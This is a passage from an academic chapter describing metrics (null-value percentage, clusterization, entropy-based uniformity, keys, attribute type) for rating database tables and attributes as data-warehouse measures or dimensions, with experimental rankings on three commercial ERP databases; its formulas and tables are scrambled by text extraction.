where: (i) p = d or m (d = dimension, m = measure); (ii) e = 1, ..., k identifies the metric; (iii) j = 1,…, q identifies the table; (iv) Cp,e is the coefficient of the table-metric e.
618
•
cRec(tj). It counts the number of records actually stored into the table tj. cAttr(tj). It counts the number of attributes in the table tj.
Percentage of Records This metric measures the percentage of records stored into the considered table with respect to the total number of DB records (or the considered subset), using the function cRec(tj). It is important to note that into the original DB, different tables can store data referring to different time intervals (typically, the most recent transactional data). For example, into a real DB old transactional data are generally either deleted or moved into other secondary tables. Then, to correctly compare the number of records stored into different tables, a first normalization based on temporal intervals is useful (TNORM). More specifically, if a table does not store transactional data (e.g., it stores information on customers and/or suppliers), the number of records considered for this metric corresponds to the number of records actually stored into the table. On the other hand, the time-normalization is required if the table stores information related to transactional activities; in such case, our methodology asks the designer to specify the temporal attribute of the table related to transactional activities on which apply the TNORM function. Being q the total number of tables, the final index for the table tj is computed as described in Formula 2. M 1 (t j ) =
TNORM (cRec(t j )) q
∑ TNORM (cRec(t )) j =1
j
(2)
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
If the analysis concerns the identification of the tables that are more suitable to extract measures, the corresponding coefficient is positive (Cm,1 > 0) since tables storing transactional and operational information are generally characterized by an higher number of records with respect to the other tables. On the other hand, the coefficient for dimensions is negative (Cd,1 < 0) since, for example, tables pertaining to business objects definitions (e.g., products and clients) are typically characterized by a lower number of records than transactional archives. Figure 1 shows the percentage of records for the tables of the three real commercial DBs of the experiment. It is interesting to note that the distribution of records into different tables is similar into the considered DBs; most tables (about 80%) store a limited percentage of records (less than 5%), while only few tables (less than 5%) are characterized by a large number of records. In other words, there are several tables contributing positively to the quality of the attributes from dimensions point
of view, while from measures point of view the number of table is more limited.
Percentage of Attributes This metric measures the percentage of attributes belonging to the considered table with respect to the total number of DB attributes. The index for this metric is computed as described in Formula 3. M 2 (t j ) =
cAttr (t j ) q
∑ cAttr (t ) j =1
(3)
j
The coefficient for this metric is positive for measures (Cm,2 > 0) since, for example, tables storing information on business objects are typically characterized by an high number of attributes. A negative coefficient is used in the case of dimensions (Cd,2 < 0) because tables storing information concerning transactional activities are generally characterized by a lower number of attributes.
Figure 1. Percentage of records stored into different tables
Figure 2. Percentage of attributes stored into different tables
619
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Figure 2 shows the percentage of attributes for the same tables of the experiment; one can easily note that the attributes are more distributed on DB tables with respect to the number of records.
List of Coefficients for Table-Metrics Table 1 summarizes the set of coefficients we have employed for evaluating the DB tables. By changing that coefficient of a given metric, one can modifies the weight of the corresponding index. In our experiment, the absolute value of all coefficients belongs to the interval [0, 1]; when the coefficient of a given metric is close to 0, the corresponding index (independently from its value) barely influences the indicators Sm,j and Sd,j of the table tj. On the other extreme, metrics characterized by coefficients that are close to 1 heavily influences these indicators. Since the percentage of records stored into a table is a feature that is more relevant with respect to the percentage of attributes characterizing the table, in our experiment the coefficient for the second metric is smaller that the one assigned to the first metric. In particular, while the coefficient for M1 equals 1, for M2 equals 0.5 (while the sign of the coefficient depends on the role considered for the analysis, i.e., dimensions or measures point of view).
The global indicators sd,i and sm,i measuring how much the attribute ai is suitable to be used respectively as measure and dimension are derived by differently combining the indexes derived by the metrics mh=1..r using respectively the coefficients cm,h and cd,h. In particular, the two indexes sd,i and sm,i are derived as described in Formula 4. r
s p ,i =
• •
• •
Table 1. List of coefficients for table-metrics • Cd
620
Cm
M1 - Percentage of records
-1
1
M2 - Percentage if attributes
-0.5
0.5
h =1
p,h
* mh (ai ) ) r
(4)
where (i) p = d or m (d = dimension, m = measure); (ii) h = 1, ..., r identifies the metric; (iii) i identifies the attribute; (iv) cp,h is the coefficient of the attribute-metric h considering the role p of the attribute. In the case of a DW attribute derived as a combination of more than one DB attributes, the corresponding index is derived as the mean of the indexes related to the DB attributes. In the following, we first introduce a set of definitions and elementary functions, and then we describe in proposed metrics and corresponding coefficients:
Indexes for Attributes In this Section, we describe the set of metrics mh=1.. and corresponding indexes we propose for DB r attributes. The aim of these metrics is to highlight different proprieties and features of data.
∑ (c
cNull(ai). It counts the number of null values of the given attribute ai. cValue(ai, v). It counts the number of occurrences of the value v into the given attribute ai (more generally, the number of instances of a given value into an array). cValues(ai). It counts the number of different values of the considered attribute ai. inst(ai, nIntervals). This function returns an array of nIntervals integer values. In particular, it first subdivides the domain into nIntervals intervals and then, for each interval, it counts the number of data falling into the corresponding range of values. Pkey(tj) identifies the set of attributes belonging to the primary key of the table tj.
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
•
• • •
•
cPkey(tj). It counts the number of attributes constituting the primary key of the table tj. cPkey(tj, ai). It returns 1/ cPkey(tj) if the attribute ai belongs to cPkey(tj), 0 otherwise. Dkey(tj) identifies the set of duplicable keys of the table tj. cDkey(ti). It counts the total number of attributes belonging to duplicable keys of the table tj. cDkey(tj, ai). It counts the total number of instances of the attribute ai in Dkey(tj) (the same attribute can belong to more than one duplicable key).
Percentage of Null Values Given the attribute ai belonging to the table tj, this metric measures the percentage of data having null values as described in Formula 5. m1 (ai ) =
cNull (ai ) c Re c(t j )
ai ∈ t j
(5)
Although simple, this metric provides an important indicator concerning the relevance of an attribute since, independently from its role, attributes characterized by a high percentage of null values are not suitable to effectively support decision processes. For example, an attribute having a percentage of null values greater than 90% is characterized by a scarce informative content from the analysis point of view. For this reason, both coefficients for this metric are negative (cm,1 and cd,1 < 0), highlighting that the presence of an high number of null values is an undesirable feature for both dimensions and measures. Concerning the order in which different metrics are applied, it is important to note that the percentage of null values is the first-computed index and the computation of the other indexes is constrained to the value provided by this metric. Indeed, the other indexes are computed only if the percentage of null values is below a given threshold (e.g., in our experiments = 95%).
Experimenting our methodology on real commercial databases, we have measured a percentage of null values that is considerably higher than expected. For example, the overall percentage of null values for the databases considered in the experimental evaluation reported in the Experimental Evaluation section are 41,36%, 42,62% and 51,53%, respectively, for the first, second, and third DB. Figure 3 shows the ranked indexes (increasing order) computed for the attributes belonging to the considered DBs. It is interesting to note that the three DBs show similar distributions of null values; about one third of the attributes do not contain null values, another one third stores only null values, and the remaining one third of attributes is characterized by different (linearly distributed) percentages of null values.
Number of Values Given the attribute ai belonging to the table tj, the index computed by this metric concerns the extent in which the attribute assumes different values on the domain. In particular, the metric returns an index that is close to 1 in two different (and opposite) cases: (i) the attribute assumes a limited number of different values or (ii) it assumes a wide range of different values. Values ranging from 0 to 1 are computed for intermediate situations. The index for this metric is computed as described in Formula 6, see Box 1. If the percentage of null values is above the chosen threshold, or if the domain is represented by a single value, then index equals 0. On the other extreme, the index equals 1 when the attribute is characterized only by two different values. In the other cases, this metric behaves like the cosine function. As a result, if an attribute assumes a small number of different values (e.g., in the case of units of measurement where only a limited number of different values is admitted), this metric derives a value that is close to 1. A similar value is derived when an attribute is the primary key of a large table, since in this case the number of
621
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Figure 3. Percentage of null values for the attributes
Box 1. ⎧ ⎪0 ⎪ ⎪ ⎪1 m2 (ai ) = ⎨ ⎪ ⎪⎛ ⎛ cValues (ai ) − 2 ⎪ ⎜ cos ⎜ *2 ⎜ c Re c(t ) − cNull (a ) − 2 ⎪⎜ j i ⎝ ⎩⎝
if (m1 (ai ) > threshold ) or (c Re c(ai ) − cNull(ai ) < 2) if (c Re c(ai ) − cNull(ai ) = 2) ⎞ ⎞ ⎟⎟ + 1⎟ / 2 otherwise ⎟ ⎠ ⎠
(6) different values equals the total number of records stored into the table. If the analysis concerns the evaluation of how much an attribute is suitable to be used as dimension, the corresponding coefficient is positive (cd,2 > 0), since both attributes assuming a limited number of different values and ones characterized by a large number of different values can be effectively used for exploring the data. For example, an attribute storing information on the payment type (e.g., cash money or credit card) is suitable to be used as dimension and typically it is characterized by limited number of different values. On the other extreme, an attributes storing information on product or customer codes is also suitable to be used as dimension and typically it is characterized by a high number of different values. With respect to the measures choice, the coefficient is negative (cm,2 < 0) because attributes characterized by (i) a few values are generally not suitable to be used as measures, since they do not contain discriminatory and predictive
622
information, and (ii) a large number of different values can correspond to keys and then result unsuitable to be used as measures. On the other hand, attributes storing information related to transactional activities (then, suitable to be used as measures) are characterized by a number of values (e.g., purchase money or number of elements sold) that is lower with respect to the total number of records. Figure 4 shows the ranked indexes (increasing order) computed for the attributes belonging to the three different commercial DBs of the experiment. Also in this case, it is interesting to note that the computed indexes exhibit similar distributions.
Degree of Clusterization Given the attribute ai belonging to the table tj, this metric measures the extent in which the attribute assumes similar values on the domain. The index for this metric is computed as described in Formula 7, see Box 2.
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
This metric works at follows. First, using the inst(ai, sqrt(cRec(tj)-cNull(ai))) function, it discretizes the domain of ai by equally subdividing it into a number of intervals equals to the square root of the number of not-null values of ai. As a result, the more the number of not-null values, the more the number of intervals used for the discretization. With respect to the choice of having a number of intervals linearly proportional to the number of values, the square root function allows one to reduce the complexity of the computation in the case of a huge number of records (that is the typical scenario for the attributes belonging to tables that store information on transactional activities). Then, the index is derived by counting the number of intervals having at least one value falling in them. If there are several empty intervals, this means that data are clustered on the domain and then the computed index is close to 1. On the other hand, if values are spread on the domain, it is probable that most intervals have at least one value falling in them; in this case, the computed index is close to 0. It is important to highlight that this metric does not consider the
distribution of values into different intervals, but only the number of empty intervals. If the analysis concerns the evaluation of how much an attribute is suitable to be used as dimension, the corresponding coefficient is positive (cd,3 > 0), since typically attributes that are suitable to be used as dimensions (e.g., numerical codes and names of products, customers and supplier) are clusterizable. On the other hand, the coefficient for measures is negative (cm,3 < 0), since attributes suitable to be used as measures generally are characterized by values that tend to spread over the domain. Figure 5 shows the ranked indexes (increasing order) computed for the attributes belonging to the three considered commercial DBs.
Uniformity of Distribution This metric measures how much the values of an attribute are equally distributed on the domain. More specifically, this metric use the general meaning of entropy for characterizing the distribution of data of a given attribute. With this metric
623
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Figure 5. Degree of clusterization for the attributes
we aim at automatically distinguishing a uniform distribution from other types of distribution. The concept of entropy is used in a wide range of different application domains. For example, in physics, the entropy quantifies the amount of disorder of a system while, in the field of information theory, the concept of entropy relates to the amount of uncertainty about an event associated with a given probability distribution. In this context, Shannon defines entropy in terms of a discrete random event x, characterized by a set of possible states i=1...n as described in Formula 8.
to the previous metric, this one uses the inst(ai, sqrt(cRec(tj)-cNull(ai))) function to discretize the domain of ai and count the number of values falling into different intervals. The metric then normalizes these values, deriving for each interval the value p(k) corresponding to the percentage of values falling into the kth interval. Then, the index for this metric is derived using the above definition of entropy and normalizing the computed value. As a result, the index measuring the uniformity of distribution is computed as described in Formula 9, see Box 3. Where
n n ⎛ 1 ⎞ H ( x) = ∑ p (i ) log 2 ⎜ ⎟ = −∑ p(i ) log 2 p(i ) i =1 i =1 ⎝ p (i ) ⎠
− log 2
(8)
1 n
is used for normalization purposes (the maximum value is obtained in the case of uniform distributions). The possibility of highlighting uniform distributions enables our methodologies to effective evaluating attributes that are suitable to be used
where p(i) indicates the probability of i. We used the concept of entropy for characterizing the distribution of values of a given attribute. In particular, the index m4(ai) for the attribute ai is computed as follows. First of all, similarly
Box 3. −
nIntervals
∑ k =1
m4 (ai ) =
inst (ai , nIntervals )[k ] nIntervals
∑ t =1
inst (ai , nIntervals )[t ] − log 2
log 2
inst (ai , nIntervals)[k ] nIntervals
∑
1 nIntervals
k =1
inst (ai , nIntervals)[t ]
nIntervals = sqrt (cNull (ai ))
(9)
624
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
as measures, since typically these attributes are characterized by other types of distribution (e.g., normal distribution). For example, it is more probable that the distribution of values of an attribute storing information on the customer is more similar to a uniform distribution with respect to the distribution of values of an attribute storing information on the bill (typically characterized by a Gaussian distribution of values). For this reason, if the analysis concerns the evaluation of how much an attribute is suitable to be used as a measure, the corresponding coefficient is negative (cm,4 < 0) since the attributes suitable to be used as measures are generally characterized by values that are not equally distributed on the domain. On the other hand, if the analysis concerns dimensions, the corresponding coefficient is positive (cd,4 > 0) since the more values are uniformly distributed on the domain (or in the considered subset), the more effectively the analyst can explore the data. Figure 6 shows the ranked indexes (increasing order) computed for the attributes belonging to the three commercial DBs. It is important to highlight the difference between this metric and the previous one; although both based on the same domain discretization, while the uniformity of distribution considers the number of times the values falls into different intervals, the degree of clusterization takes into account only the number of intervals that have at least one value falling in them. As a
result, while this metric provides information on the distribution of values, the previous one indicates if the values stored into the attributes can be clustered.
Keys This metric derives a value both taking into account if the considered attribute belong or not to primary and/or duplicable keys and considering the total number of attributes constituting the keys. The primary key of a given table tj can either correspond to a single attribute (in this case, cPkey(tj) = 1) or can be composed by a set of attributes (cPkey(tj) > 1). Moreover, it is important also to note that in a given table tj (i) more than one duplicable key can exist, each one (potentially) characterized by a different number of attributes, (ii) an attribute can belong to more than one duplicable key (in this case, cDkey(tj, ai) > 1). For combining the information on primary and duplicable keys, we introduce the additional parameter w∈[0, 1]; more specifically, w is used for differently weighting attributes belonging to the primary key and ones belonging to secondary keys. In our experiments, we assign the same weight to primary and secondary keys (i.e., w = 0.5). Given the attribute ai belonging to the table tj, the index for this metric is computed as described in Formula 10.
Figure 6. Uniformity of distribution for the attributes
625
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
On one extreme, if ai is the primary key of the table tj and the table does not contain duplicable keys, the index for ai equals 1, while all the indexes for the other attributes equal 0. The coefficient for dimensions is positive (cd,5 > 0) since attributes belonging to the primary or secondary keys often identify look-up tables and then they are the best candidates for dimensions into a DW. On the other hand, the coefficient for measures is negative (cm,5 < 0) since attribute belonging to primary or secondary keys typically are not suitable to be used as measures. Figure 7 shows the ranked indexes (increasing order) computed for the attributes belonging to the three commercial DBs.
Type of Attribute This metric returns a float value according to the type of the attribute. More specifically, the index for such metric is derived as described in Formula 11, see Box 5. Typically numerical attributes are more suitable to be used as measures rather than being used as dimensions; for this reason, the coefficient for measures is positive (cm,6 > 0). On the other hand, in the case of dimensions, the corresponding coefficient is negative (cd,6 < 0) since business objects definitions are often coded by alphanumerical attributes. Moreover, alphanumerical attributes
are rarely use in a DW as measures due to the limited number of applicable mathematical functions (e.g., count function).
List of Coefficients for Attribute-Metrics Although coefficients can take arbitrary values, we actually assign unitary values to the related coefficients (i.e., -1 or +1); as a result, in our experiments we have equally weighed the indexes computed by our metrics for deriving the global indexes sd and sm. However, we intend to investigate in our future work if an accurate tuning of the coefficients may lead to more effective results. Table 2 summarizes the set of coefficients we have employed for the attributes.
DW-QUALITY METRIC Our methodology characterizes each attribute with a couple of global indexes Gm,i,j and Gd,i,j indicating how much the attribute ai belonging to the table tj is suitable to be used respectively as measure and as dimension. These indexes are computed as described in Formula 12. G p ,i , j = S p , j * s p ,i
ai ∈ t j
(12)
626
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Figure 7. Keys for the attributes
Box 5. ai stores boolean values or alphanumerical strings of various type ⎧0 ⎪ m6 (ai ) = ⎨ 0.5 ai stores whole numbers of various type ⎪1 ai stores decimal values of various type ⎩
(11) Table 2. List of coefficients for attribute-metrics
m1 - Percentage of null values
cd
cm
-1
-1
m2 - Number of values
1
-1
m3 - Degree of clusterization
1
-1
m4 - Uniformity of Distribution
1
-1
m5 - Keys
1
-1
m6 - Type of attribute
-1
1
where: (i) p = d or m (d = dimension, m = measure); (ii) i identifies the attribute; (iii) j identifies the table; (iv) Sp,j corresponds to a table-metric index; (v) sp,j corresponds to a attribute-metric index. Once all these indexes are computed, our methodology derives two lists of attributes: the first list of attributes contains all DB attributes ordered according to Gd, while the second one is ordered according to Gm. We then define rankd(ai) the function deriving the relative position of ai into the first (ordered) list, while rank m(ai) the function deriving the position of ai into the second list. We use these ranking functions to evaluate
the effectiveness of our methodology in correctly identifying the set of attributes that are more suitable for the DW construction (see section titled Experimental evaluation–Attribute indexes). The global index I(DW) measuring the total quality of the final DW is derived using the above indexes. More specifically, being Ad the set of nd attributes chosen as dimensions and Am the set of nm attributes to be used as measures, the index measuring the total DW quality is computed as described in Formula 13.
∑G
I ( DW ) =
ai ∈ Am ai ∈t j
m ,i , j
+
∑G
ai ∈ Ad ai ∈t j
d ,i , j
nd + nm
(13)
EXPERIMENTAL EVALUATION As defined in the introduction, we have experimented our methodology on three subsets of DBs of two real world business systems. Considered
627
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
subsets are characterized by hundreds of tables, thousands of attributes and millions of records. In particular, while DB01 and DB02 correspond to different instantiations of the same DB schema (it is the same ERP system used by two different commercial organizations), DB03 has a different DB schema (it is based on a different ERP system). For the experimental evaluation, we asked to an expert to build an unique (and relatively simple) schema for a commercial DW. The expert selected the attributes that are the most suitable to support decision processes. In particular, the DW build by
the expert is characterized by a star schema where six attributes are used as measures (nm = 6) and nine attributes as dimensions (nd = 9). Starting from this schema, we build three DWs, filling them with the three different DB sources. As a result, the attributes chosen to build the first two DWs are physically the same (since they belong to the same DB schema), while a different set of attributes (characterized by the same semantics with respect to ones selected for previous DWs) are chosen for the DW03 construction. Then, we have experimented our methodology for testing its effectiveness by considering the
Table 3. List of tables of DB01, DB02 and DB03 ranked according to (a) Sd and (b) Sm (a) Dimensions Tables of DB01
Tables of DB01
Sm
gum
0,7480
xsr
0,4996
zon
0,7461
art
0,3282
smag
0,7459
…
…
…
…
smag
0,2541
art
0,6718
zon
0,2539
xsr
0,5004
gum
0,2520
Tables of DB02
Sd
Tables of DB02
Sm
gum
0,7481
art
0,4220
zon
0,7463
xsr
0,4016
smag
0,7458
…
…
…
…
smag
0,2542
xsr
0,5984
zon
0,2537
art
0,5780
gum
0,2519
Sd
Tables of DB03
Sm
COW_GRUPPO_IMPREND
0,7494
MAG_COSTO
0,4577
COW_ZONA_COMMERCIALE
0,7490
VEW_V_BOLLA_RIGA_ ADD
0,3366
MAG_TAB_RICL_DESCR
0,7465
…
Tables of DB03
…
628
(b) Measures Sd
…
…
MAG_TAB_RICL_DESCR
0,2535
VEW_V_BOLLA_RIGA_ADD
0,6634
COW_ZONA_COMMERCIALE
0,2510
MAG_COSTO
0,5423
COW_GRUPPO_IMPREND
0,2506
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
above three case studies. The analysis is mainly targeted at evaluating if the proposed metrics effectively support quantitative analysis by taking into account (i) the structure of the initial DB (in this experiment, two different DB schemas are considered), (ii) data actually stored into the initial DB (in this experiment, three different data sources are considered), and (iii) the DW schema (in this experiment, an unique DW schema is considered). We have then evaluated both if during the DW construction the proposed methodology can be effectively used to drive design choices and, at the end of the selection phase, if it can be used for deriving information on the total quality of the final DW.
Table Indexes In the first phase of our experiment, we have considered the metrics we propose for the DB tables and evaluated if they highlight tables that are more suitable to extract measures and dimensions. The global indexes Sd and Sm for the three DBs are summarized respectively in Table 3(a) and Table 3(b). Derived quality measurements for the DB tables are consistent with our expectations; for example, for both DB01 and DB02, the procedure highlights that xsr and art are the most suitable tables for extracting measures. Indeed, while the first table stores selling information, the second one includes pricing information on products. It is also interesting to note that although based on the same DB schema, different indexes are computed for DB01 and DB02 due to different distributions of data. With respect to measures, a similar result is obtained for DB03, where the table MAG_ COSTO is semantically equivalent to art, and VEW_V_BOLLA_RIGA_ADD stores the same kind of information stored into xsr. Derived quality measurements also indicate that both in DB01 and DB02 smag, zon and gum are the most suitable tables for extracting dimensions, while
they result less suitable for selecting measures. Indeed, smag and gum store information on categories respectively of products and customers, while zon stores geographical information on customers. Similarly for COW_GRUPPO_IMPREND, COW_ ZONA_COMMERCIALE and MAG_TAB_RICL_DESCR, where these tables store the same kind of information respectively of gum, zon and smag. In general, tables that are the best candidate to extract measures, are the worst ones to extract dimensions and vice versa. It is also interesting to note that the expert selected as measures attributes belonging to xsr and art in the case of DW01 and DW02, while attributes belonging to MAG_COSTO and VEW_ V_BOLLA_RIGA_ADD for building DW03. On the other hand, some of the dimensions chosen by the expert correspond to attributes belonging to gum, zon and smag in the case of DW01 and DW02, while the expert selected attributes belonging to COW_GRUPPO_IMPREND, COW_ZONA_ COMMERCIALE and MAG_TAB_RICL_DESCR for building DW03.
Attribute Indexes In the second phase of the experiment, we have considered the metrics we propose for the DB attributes. Using the indexes computed in the previous phase, for each considered attribute we derive the quality indexes Gd and Gm, summarized respectively in Table 4(a) and Table 4(b). The last column of Table 4(a) and Table 4(b) specifies respectively rankd and rank m (0 corresponds to the first position and then to the best candidate, while 1 corresponds to the last position and then represents the worst candidate). Also these computed indexes are consistent with our expectations; for example, in DB01 the attribute ag_cod_agente results the most appropriate one to be used as a dimension, and it results unsuitable to be used as a measure. This result is in line with our expectations, since the considered attribute stores
629
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Table 3. List of tables of DB01, DB02 and DB03 ranked according to (a) Sd and (b) Sm (a) Dimensions Tables of DB01
(b) Measures Sd
Sm
gum
0,7480
xsr
0,4996
zon
0,7461
art
0,3282
smag
0,7459
…
…
art xsr
Tables of DB02
…
…
smag
0,2541
0,6718
zon
0,2539
0,5004
gum
0,2520
Sd
Tables of DB02
Sm
gum
0,7481
art
0,4220
zon
0,7463
xsr
0,4016
smag
0,7458
…
…
…
…
smag
0,2542
xsr
0,5984
zon
0,2537
art
0,5780
gum
0,2519
Tables of DB03 COW_GRUPPO_IMPREND
Sd
Tables of DB03
Sm
0,7494
MAG_COSTO
0,4577
COW_ZONA_COMMERCIALE
0,7490
VEW_V_BOLLA_RIGA_ ADD
0,3366
MAG_TAB_RICL_DESCR
0,7465
…
…
…
…
MAG_TAB_RICL_DESCR
0,2535
VEW_V_BOLLA_RIGA_ADD
0,6634
COW_ZONA_COMMERCIALE
0,2510
MAG_COSTO
0,5423
COW_GRUPPO_IMPREND
0,2506
information on sellers’ codes. On the other hand, the attribute xr_valore results the most appropriate one to be used as measure, but unsuitable to be used as dimension. Also in this case, this result is consistent with the semantics of data, since this attribute stores pricing information. Similar results are obtained for DB02 and DB03. Moreover, it is interesting to note that the attributes occupying the last positions are the same both in Table 4(a) and Table 4(b) (e.g., zn_ragg_1 for DB01). This is due to the fact that these attributes are characterized by
630
Tables of DB01
a high percentage of null values and then they result unsuitable to be used both as dimensions and measures in the considered DBs.
Indexes of Selected Measures and Dimensions In the third phase of our experiment, we have considered the DW built by the expert and analyzed the rank of selected attributes in order to evaluate the effectiveness of our methodology in correctly measuring the quality of the attributes according to their role into the DW.
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Table 4. Attributes of DB01, DB02 and DB03 ranked according to (a) Gd and (b) Gm (a) Dimensions Attributes of DB01
(b) Measures Gd
rankd
Attributes of DB01
ag_cod_agente
0,5974
0,0000
zn_sigla
0,5661
0,0059
…
…
0,1426
0,7219
… xr_valore …
Gm
rankm
xr_valore
0,3515
0,0000
xr_num_ord
0,3006
0,0059
…
…
0,0939
0,6982
… ag_cod_agente
…
…
…
…
xr_sconto_ex_vsc
0,0000
0,9941
xr_sconto_ex_vsc
0,0000
0,9941
zn_ragg_1
0,0000
1,0000
zn_ragg_1
0,0000
1,0000
Gd
rankd
Attributes of DB02
Gm
rankm
ps_sigla_paese
0,5956
0,0000
xr_prezzo
0,2742
0,0000
gu_codice
0,5743
0,0056
xr_valore
0,2741
0,0056
…
…
…
…
0,1038
0,5307
0,0937
0,5251
…
…
…
…
xr_val_sco
0,0000
0,9944
xr_val_sco
0,0000
0,9944
zn_ragg_1
0,0000
1,0000
zn_ragg_1
0,0000
1,0000
Attributes of DB03
Gd
rankd
Attributes of DB03
Gm
rankm
COD_VOCE_RICL_ COD_IND_RICL
0,6849
0,0000
COSTO
0,2565
0,0000
COD_LINGUA
0,6375
0,0020
COSTO_CALCOLATO
0,2529
0,0020
…
…
…
…
0,2131
0,6373
0,0632
0,6529
Attributes of DB02
… xr_prezzo …
… COSTO …
…
… ps_sigla_paese …
… COD_VOCE_RICL_ COD_IND_RICL
…
…
…
…
VAL_SCONTO_TEST
0,0000
0,9980
VAL_SCONTO_TEST
…
0,0000
0,9980
VOCE_DI_SPESA
0,0000
1,0000
VOCE_DI_SPESA
0,0000
1,0000
Table 5. Ranking of DW01, DW02 and DW03 measures Source
Gm
rankm
DW
DB01 and DB02
DB03
DB01
DB02
DB03
DB01
DB02
DB03
product quantity
xr_qta
QTA_SPEDITA
0,2769
0,1725
0,1707
0,0179
0,2135
0,0452
product price
xr_valore
RIGA_PREZZO
0,3515
0,2741
0,1452
0,0000
0,0056
0,1454
broker commission
xr_prov_age
PROVV_AG1
0,2720
0,0000
0,1629
0,0238
0,9607
0,0766
customer discount
xr_val_sco
SC_RIGA
0,2617
0,0000
0,1685
0,0298
0,9888
0,0511
product last cost
a_ult_prz_pag
COSTO_F1
0,2060
0,2026
0,2565
0,1071
0,1236
0,0020
product std. cost
a_prz_pag_stand
COSTO_F2
0,1873
0,2105
0,2565
0,1667
0,0955
0,0000
631
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
In Table 5, we report the measures chosen for building the three DWs and related ranks. With respect to the measures choice, our methodology evaluates differently the quality of the design choices for the three DWs. Indeed, the computed indexes does not depend on semantics of selected measures (that is the typical criterion adopted by the expert for the DW construction), rather than on the data actually stored into selected attributes and on the initial DB schema. To better evaluate the obtained results, we illustrate in Figure 8 the whole set of DB attributes ranked according to Gm, highlighting the measures chosen by the expert to build the DW. In the case of DW01, four out of six attributes selected by the expert rank under the 3% of the whole set of considered attributes, and the remaining two attributes rank under the 17%. A good result is also obtained for DW03, where five out six attributes rank under the 8% and the remaining attribute rank under the 15%. A different result is obtained for DW02, where four out of six attributes rank under the 22% of the whole set of DB02 attributes, while the remaining two attributes are characterized by a low data quality. We have then analyzed xr_ prov_age and xr_val_sco, discovering that these attributes are characterized by an high percentage of null values (> 90%) and then, although chosen due to their semantics by the expert to build the DW, in DB02 they are not useful to be used for analysis purposes. Also with respect to the dimensions choice, our methodology evaluates the attributes chosen to build the DWs.
Figure 8. Derived quality for measures
632
In Table 6, we report the dimensions chosen for building the three DWs and related ranks. In the case of DW01, five out nine attributes rank under the 6% of the whole set of considered attributes and three attributes under the 18%; moreover, our procedure correctly highlights that xi_ prov has a scarce informative content being characterized by an high percentage of null values (>80%). A good result is also obtained for DW03, where all selected dimensions rank under the 4% of the whole set of considered attributes. Like in the case of measures, also in the case of dimensions the expert build DW02 by selecting some attributes that are semantically relevant, but they are actually not suitable to effectively support the analysis due to stored data (also in this case, the percentage of null values of ag_cod_agente and a_cl_inv is over a given threshold). These attributes inevitably affect the quality of the final DW. All the other selected dimensions rank under the 9% of the whole set of considered attributes. A graphical representation of these results is depicted in Figure 9, where dimensions chosen by the expert to built the DWs are highlighted. Indeed, the construction and configuration of an effective DW requires not only the knowledge of both the logical structure of the DB and semantic information on its attributes, but it needs to know how an organization actually uses the business system (since it influences the data distributions). The result confirms the effectiveness of the proposed methodology in supporting the design,
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Table 6. Ranking of DW01, DW02 and DW03 dimensions Source DW
DB01 and DB02
Gd DB01
DB02
DB03
DB01
DB02
DB03
0,5513
0,4727
0,5828
0,0417
0,1236
0,0177
COD_VOCE_RICL_ COD_IND_RICL_F1
0,5400
0,5666
0,6849
0,0536
0,0169
0,0020
a_cl_inv
COD_VOCE_RICL_ COD_IND_RICL_F2
0,5175
0,0000
0,6849
0,0833
0,6910
0,0000
customer
sc_cod_s_conto
CONTI_CLIENTI_M_P
0,4715
0,4970
0,6335
0,1786
0,0787
0,0039
customer class
gu_codice
COD_GRUPPO
0,4987
0,5743
0,6224
0,1250
0,0056
0,0059
province
xi_prov
COD_PROVINCIA
0,3644
0,4894
0,5582
0,3750
0,0899
0,0314
country
ps_sigla_paese
ELENCO_STATI_ COD_ISO
0,5634
0,5956
0,6124
0,0179
0,0000
0,0079
broker
ag_cod_agente
CONTI_FORNITORI_M_P
0,5974
0,0000
0,6098
0,0000
0,5449
0,0098
commercial zone
zn_sigla
COD_ZONA_COMM
0,5661
0,5662
0,5668
0,0060
0,0225
0,0275
product
a_sigla_art
product class
smg_tipo_codice
warehouse class
DB03
Rankd
COD_ARTICOLO
creation and evaluation of DWs, since it is able to correctly highlight the attributes that are more suitable to be used as dimensions and measures.
•
DW Quality
•
The final phase of our experiment is targeted at comparing the derived global indicators measuring the quality of the three different DWs. Applying our methodology, we have obtained the global indicators I(DW01)=0.415, I(DW02)=0.308 and I(DW03)=0.448. From computed measurements, DW03 results the better DW, while DW02 result the worst one, due to both the low quality of data stored into the selected DB attributes and the initial DB schema. In the following Section we discuss in more detail derived results.
ASSESSMENT It is important to note that the final DW-quality measurement is influenced by three different factors:
•
The DW design choices. For a given DB, the measured DW quality strictly depends on selected measures and dimensions. The schema of the initial DB. Some indexes depend only on the initial DB schema. For example, given two DBs characterized by the same schema (e.g., DB01 and DB02), the attribute metrics m5 and m6 derive the same measurements independently from the data actually stored into analyzed attributes. Characteristics and quality of data actually stored into the selected attributes. Most indexes depend on the features (e.g., percentage of null values and data distribution) of data actually stored into the selected DW attributes. As a result, given two DWs built starting from DBs characterized by the same schema, a metric can derive a different measurement depending on the values actually stored into the considered attribute.
Our methodology highlights that DW03 results the best DW, while DW02 results the worst one, due to both the low quality of data stored into the selected DB attributes and the initial DB
633
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
